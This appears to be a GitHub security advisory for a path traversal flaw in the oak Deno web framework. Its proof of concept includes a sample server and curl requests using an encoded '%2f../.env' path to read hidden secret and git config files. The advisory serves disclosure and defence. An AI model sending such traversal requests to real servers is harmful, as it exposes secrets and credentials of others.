Lucene search

K
githubGitHub Advisory DatabaseGHSA-QM92-93FV-VH7M
HistoryNov 01, 2024 - 9:37 p.m.

Path traversal in oak allows transfer of hidden files within the served root directory

2024-11-0121:37:10
CWE-22
CWE-35
GitHub Advisory Database
github.com
13
oak
path traversal
hidden files
context.send
url encoded
poc
server
sensitive data
server secrets

CVSS4

7.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/E:P

AI Score

6.8

Confidence

High

EPSS

0

Percentile

16.7%

Summary

By default oak does not allow transferring of hidden files with Context.send API. However, this can be bypassed by
encoding / as its URL encoded form %2F.

Details

1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that
contains URL encoded characters unless the client URL encodes it first.

2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from subdir/.env.

PoC

// server.ts

import { Application } from "jsr:@oak/[email protected]";

const app = new Application();

app.use(async (context, next) => {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});

await app.listen({ port: 8000 });

In terminal:

# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops >  root/.git/config

# start server
deno run -A server.ts

# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config

Impact

For an attacker this has potential to read sensitive user data or to gain access to server secrets.

Affected configurations

Vulners
Node
oakserveroakRange14.1.0
VendorProductVersionCPE
oakserveroak*cpe:2.3:a:oakserver:oak:*:*:*:*:*:*:*:*

CVSS4

7.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/E:P

AI Score

6.8

Confidence

High

EPSS

0

Percentile

16.7%

Related for GHSA-QM92-93FV-VH7M